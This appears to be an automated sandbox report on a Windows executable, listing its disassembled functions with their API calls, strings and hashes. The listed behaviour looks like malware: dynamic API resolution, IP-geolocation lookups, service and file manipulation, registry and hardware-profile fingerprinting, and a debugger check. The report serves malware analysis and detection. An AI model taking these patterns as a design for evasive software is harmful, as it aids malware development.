                                                • String ID: de$de$de$12we3fwe$Hde$Hde$Hde$Hde$Hde$Hde$stryd
                                                • API String ID: 2437662777-1215628347
                                                • Opcode ID: 06b3b049aa6a4a1fdaeb1d74838be070c6db68e3178cf525ad95319f50ceef1a
                                                • Instruction ID: 205fe942673328ef8f143fa00ff17b61f78fffe5bd3c0a4bbd596a8c05512595
                                                • Opcode Fuzzy Hash: 06b3b049aa6a4a1fdaeb1d74838be070c6db68e3178cf525ad95319f50ceef1a
                                                • Instruction Fuzzy Hash: DF62D074D092A88ADB26CF28CC95BD9BBB1AF5A304F1481D9D98D67212DB301FC5CF51
                                                Function 00343C20 Relevance: 35.8, APIs: 10, Strings: 10, Instructions: 791libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 00343D7D
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 00343F74
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 0034416B
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 00344380
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 00344595
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 003446C8
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 003448DD
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 00344AF2
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 00344D07
                                                • GetProcAddress.KERNEL32(00323A15,?), ref: 00344EFE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc
                                                • String ID: Hde$Hde$Hde$Hde$Hde$Hde$Hde$Hde$Hde$Hde
                                                • API String ID: 190572456-3850131784
                                                • Opcode ID: 30c089357a7eadc030aae16427dc9612c79c7426d5460563a351b3ffb7bd74f2
                                                • Instruction ID: e783e441fa9483b22d903721777b0e47cfd02b736b1df1e8828e3a1f8592a432
                                                • Opcode Fuzzy Hash: 30c089357a7eadc030aae16427dc9612c79c7426d5460563a351b3ffb7bd74f2
                                                • Instruction Fuzzy Hash: 19B2AEB4D096A88ADB26CF288C857D9FBB1BF59305F0492D9D98C67221EB301BC5CF54
                                                Function 0031C450 Relevance: 30.9, APIs: 11, Strings: 5, Instructions: 2940COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • https://ipgeolocation.io/, xrefs: 0031F761
                                                • https://ipinfo.io/, xrefs: 0031C6F8
                                                • https://db-ip.com/, xrefs: 0031D9EE
                                                • https://www.maxmind.com/en/locate-my-ip-address, xrefs: 0031E1D0
                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 0031D0FD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: Content-Type: application/x-www-form-urlencoded$https://db-ip.com/$https://ipgeolocation.io/$https://ipinfo.io/$https://www.maxmind.com/en/locate-my-ip-address
                                                • API String ID: 3732870572-2199139642
                                                • Opcode ID: 648d687a933f86adc5a41c14b309c0847d5a8a8a643e81984cacef8f3cc3888c
                                                • Instruction ID: 009917b0750e723ea1ab30d869baf5d8cdbc5f13654d72aeaa73600de6c3ff1a
                                                • Opcode Fuzzy Hash: 648d687a933f86adc5a41c14b309c0847d5a8a8a643e81984cacef8f3cc3888c
                                                • Instruction Fuzzy Hash: E0730470D096A88AEB66CF28CC51BEABBB1AF99304F0481D9D58C67251EB701FC5CF51
                                                Function 00320A20 Relevance: 17.2, APIs: 11, Instructions: 734fileserviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,8CDA9266), ref: 00320A6F
                                                  • Part of subcall function 003203E0: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000,8CDA9266), ref: 00320436
                                                • DeleteFileA.KERNEL32(?), ref: 00320BAE
                                                • DeleteFileA.KERNEL32(?), ref: 00320E16
                                                • CopyFileA.KERNEL32(?,?,00000000), ref: 00321064
                                                • OpenServiceA.ADVAPI32(00000000,?,00000004), ref: 003211BD
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 003211D9
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0032196C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileService$CloseDeleteHandleOpen$CopyFolderManagerPathSpecial
                                                • String ID:
                                                • API String ID: 32130118-0
                                                • Opcode ID: 447dbef8d7e5e8a40ebfd22d77f815d9103187fbf61371b053e40cf31638c102
                                                • Instruction ID: f3ed32efc3462a89cbb440f67c637929d71b109457353c7c24a53064fb0bd190
                                                • Opcode Fuzzy Hash: 447dbef8d7e5e8a40ebfd22d77f815d9103187fbf61371b053e40cf31638c102
                                                • Instruction Fuzzy Hash: DB92EEB4D0A2A88BDB26CF28D994BD9BBB5AF59300F1081D9D94DA7251EB305FC5CF40
                                                Function 0033D8C0 Relevance: 14.7, APIs: 9, Instructions: 1200COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,8CDA9266), ref: 0033DBCA
                                                • GetModuleHandleA.KERNEL32(?), ref: 0033DF20
                                                • GetModuleHandleA.KERNEL32(?), ref: 0033E194
                                                • GetModuleHandleA.KERNEL32(?), ref: 0033E4EA
                                                • GetModuleHandleA.KERNEL32(?), ref: 0033E84F
                                                • GetModuleHandleA.KERNEL32(?), ref: 0033EBB4
                                                • GetModuleHandleA.KERNEL32(?), ref: 0033EEFB
                                                • GetModuleHandleA.KERNEL32(?), ref: 0033F18D
                                                • GetModuleHandleA.KERNEL32(?), ref: 0033F4F2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 42a73cd775201ed9a6ac005a126181b64f66bbdf914f7451128b477e4cb286a7
                                                • Instruction ID: dfa15224d731afda55ef9b7ba78d5e11224277a1bf713bac1f5b7d6898643db3
                                                • Opcode Fuzzy Hash: 42a73cd775201ed9a6ac005a126181b64f66bbdf914f7451128b477e4cb286a7
                                                • Instruction Fuzzy Hash: ED03B0B4D096A88ADB66CF289C517E9FBB1AF59304F0492D9C98C73252EB301BC5CF45
                                                Function 0035ACF6 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1427COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                • API String ID: 4168288129-2761157908
                                                • Opcode ID: 01ca81c70e8ce611acfbc59963e54a8ccfd0629354ff1e9479486cc4a8eb1564
                                                • Instruction ID: ef40945145413428d133c7277d917dd0bf23134b2c946d14ab253a6338540e40
                                                • Opcode Fuzzy Hash: 01ca81c70e8ce611acfbc59963e54a8ccfd0629354ff1e9479486cc4a8eb1564
                                                • Instruction Fuzzy Hash: 6DD26E71E046288FDB66CF28CD40BEAB7B9EB44306F1545EAD80DE7250E774AE858F41
                                                Function 0033D0D0 Relevance: 7.9, APIs: 5, Instructions: 392COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7301fcd9fb3960aa9a655fac13565847114244b86b3fd6cfc4634df76d16dea
                                                • Instruction ID: a72e059f1de39dcdf13318e0f4e9ed46181bf148dedde7af3d62336e4b7525a9
                                                • Opcode Fuzzy Hash: d7301fcd9fb3960aa9a655fac13565847114244b86b3fd6cfc4634df76d16dea
                                                • Instruction Fuzzy Hash: 1E22E0749052A88BDB66CF28DC84BEABBB1AF59304F0481D9C84D6B352D730AEC5CF51
                                                Function 00314DE0 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 372COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: @)$E)
                                                • API String ID: 3732870572-3004400368
                                                • Opcode ID: 18b39cef931de7dd25de464aead9eb85a81f0b1e0353610d61485c241f2b27bf
                                                • Instruction ID: 45ac480bf510dae61dca1f0227cf3ff7e8301d0c32e4309cb99797c8ab8c5f6b
                                                • Opcode Fuzzy Hash: 18b39cef931de7dd25de464aead9eb85a81f0b1e0353610d61485c241f2b27bf
                                                • Instruction Fuzzy Hash: FCF19E70E002189FDB19CFA8D855BDEBBB5FF88310F1483A9E019AB2D1DB755A85CB50
                                                Function 00313ED0 Relevance: 6.7, APIs: 4, Instructions: 700registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00313870: GetCurrentProcess.KERNEL32(00000000), ref: 0031388B
                                                  • Part of subcall function 00313870: IsWow64Process.KERNEL32(00000000), ref: 00313892
                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,00000000,?,8CDA9266), ref: 003142CF
                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00020019,?,00000400), ref: 0031445A
                                                • RegCloseKey.ADVAPI32(00000000), ref: 003144E7
                                                • GetCurrentHwProfileA.ADVAPI32(?), ref: 00314649
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentProcess$CloseOpenProfileQueryValueWow64
                                                • String ID:
                                                • API String ID: 165412945-0
                                                • Opcode ID: 1daadf9880bed4c40752d94b3722ae520d945523f27b1ea3d0547747a06a3a39
                                                • Instruction ID: 6d590e0d4a82ce7dc6c5cb072b5f8565c5752289aa405a8debbc0d08f519b697
                                                • Opcode Fuzzy Hash: 1daadf9880bed4c40752d94b3722ae520d945523f27b1ea3d0547747a06a3a39
                                                • Instruction Fuzzy Hash: 5892F2B4D092A88ADB66CF28C880BD9FBB1BF99204F0481D9D58D67251EB352BC4CF51
                                                Function 003432C0 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 438COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: %#n$Hde
                                                • API String ID: 3732870572-2497800613
                                                • Opcode ID: ce41a493a592d217ce12b3826a6a1ece65b392355eefdf090797d0c60b45b947
                                                • Instruction ID: c23430349b0260584e11f70d9002995ecbbf343fa3d7c98782d1d0df41841b64
                                                • Opcode Fuzzy Hash: ce41a493a592d217ce12b3826a6a1ece65b392355eefdf090797d0c60b45b947
                                                • Instruction Fuzzy Hash: 2A42AEB4D056688BEB66CF28CC81BD9BBB1BF99304F1082D9D94C67251EB306AC5CF41
                                                Function 00342020 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 384COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: Hde$Hde
                                                • API String ID: 0-984064285
                                                • Opcode ID: 5e4e07564409f1d57d8176a99c2e75c6c136ad80fd2836e98a4a54d8be240268
                                                • Instruction ID: 8d057d1bd15f67b0617457a759e0e6b6d2e29fe42f384223e740ed33960fa3eb
                                                • Opcode Fuzzy Hash: 5e4e07564409f1d57d8176a99c2e75c6c136ad80fd2836e98a4a54d8be240268
                                                • Instruction Fuzzy Hash: A012E4709012689BEB65DF15CC91B9ABBF4BB48300F14C2D9E48CAB285DF716E84CF90
                                                Function 00341C50 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 275COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: Hde$Hde
                                                • API String ID: 0-984064285
                                                • Opcode ID: 82552cd359cd4683e72b9593c9233ec1e51f3b8525e9034b7f800f715d74d37c
                                                • Instruction ID: 4d62f0410dd65e3f87073ceb67b0acf8386d1fa2f80ec3ef0350eadbb9114f6e
                                                • Opcode Fuzzy Hash: 82552cd359cd4683e72b9593c9233ec1e51f3b8525e9034b7f800f715d74d37c
                                                • Instruction Fuzzy Hash: 2DC11770E002489FEB25CFA4D895BEEBBB5BF48300F108199E649BB291D7716E85CF54
                                                Function 0034CD36 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 0034CE2E
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0034CE38
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0034CE45
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: 20a763328eeb954bb8f92736d222f0aec30fd746bc6473ded0f3626081fee0ed
                                                • Instruction ID: ab09abb4fe20e94ae6808ba51b5a547ebb489e4b2cdaf809ed254c0880e012a3
                                                • Opcode Fuzzy Hash: 20a763328eeb954bb8f92736d222f0aec30fd746bc6473ded0f3626081fee0ed
                                                • Instruction Fuzzy Hash: 6831C674911228ABCB62DF24DD8979DBBF8BF08310F5041DAE40DAB261E770AF858F45
                                                Function 00352633 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?,00352632,?,?,?,?,?,00350D23), ref: 00352655
                                                • TerminateProcess.KERNEL32(00000000,?,00352632,?,?,?,?,?,00350D23), ref: 0035265C
                                                • ExitProcess.KERNEL32 ref: 0035266E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: da64575e9431a3d559c61542a468f885020a4ba589286f243c49ee243fb15049
                                                • Instruction ID: ff1695555d833af8c1a083f2b2c83e36ee9ac99b96b42a7c827c79b87d441857
                                                • Opcode Fuzzy Hash: da64575e9431a3d559c61542a468f885020a4ba589286f243c49ee243fb15049
                                                • Instruction Fuzzy Hash: 47E0B631400508ABCB136F64DD19D497B6DEB56742F418414FD058A531CBB5EE86CB94
                                                Function 0034FD50 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: abce71724529f58d33a8793619ad67d8af085a803f5d200d589c480e6379cee7
                                                • Instruction ID: 343eb41958689275cb2eb7e2cf5e46cef920dc042d01278129f3f3b7c7ff6b3d
                                                • Opcode Fuzzy Hash: abce71724529f58d33a8793619ad67d8af085a803f5d200d589c480e6379cee7
                                                • Instruction Fuzzy Hash: 46F15071E006199FDF19CFA8C880AAEB7F1FF48314F158269D819AB391D731AE45CB90
                                                Function 00315340 Relevance: 2.0, APIs: 1, Instructions: 498COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID:
                                                • API String ID: 3732870572-0
                                                • Opcode ID: 3f67a3d9f1de8294d7a51051919bf51d3a16f858ec6698303166ecafacd3e821
                                                • Instruction ID: 583000278386daa76f8ff665a3f9fb8516111090aa6b3d8c6dfae128a1be5c25
                                                • Opcode Fuzzy Hash: 3f67a3d9f1de8294d7a51051919bf51d3a16f858ec6698303166ecafacd3e821
